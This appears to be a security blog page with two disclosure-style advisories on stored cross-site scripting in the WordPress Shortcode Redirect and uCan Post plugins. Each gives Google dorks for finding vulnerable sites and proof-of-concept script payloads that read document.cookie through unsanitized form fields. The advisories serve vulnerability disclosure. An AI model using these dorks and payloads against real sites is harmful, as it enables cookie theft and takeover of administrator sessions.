- DLL and Code Injection in Python
- What's New in xsssniper 0.8.x
- WordPress Mingle Forum <= 1.0.32.1 Multiple Vulnerabilities
-
# Exploit Title: WordPress Shortcode Redirect plugin <= 1.0.01 Stored XSS # Dork: inurl:/wp-content/plugins/shortcode-redirect/ # Date: 2012/01/18 # Author: Gianluca Brindisi (g@brindi.si @gbrindisi http://brindi.si/g/) # Software Link: http://downloads.wordpress.org/plugin/shortcode-redirect.1.0.01.zip # Version: 1.0.01Vulnerability
You need permissions to write a post (HTML mode) to exploit the shortcode:
# / #wordpress #advisory #stored-xss[redirect url='http://wherever.com"[XSS]' sec='500"[XSS]'] -
# Exploit Title: WordPress uCan Post plugin <= 1.0.09 Stored XSS # Dork: inurl:/wp-content/plugins/ucan-post/ # Date: 2012/01/18 # Author: Gianluca Brindisi (g@brindi.si @gbrindisi http://brindi.si/g/) # Software Link: http://downloads.wordpress.org/plugin/ucan-post.1.0.09.zip # Version: 1.0.09Vulnerability
You need permissions to publish a post from the public interface: The submission form is not well sanitized and will result in stored xss in admin pages:
-
Name field is not sanitized and it’s injectable with a payload which will be stored in the pending submission page in admin panel POC: myname’"><script>window.alert(document.cookie)</script>
-
Email field is not sanitized but can it will check for a valid email address so the maximum result will be a reflected xss POC: my@mail.com’"><script>window.alert(document.cookie)</script>
-
Post Title is not sanitized and it’s injectable with a payload which will be stored in the pending submissions page in admin panel POC: title’"><script>window.alert(document.cookie)</script>
-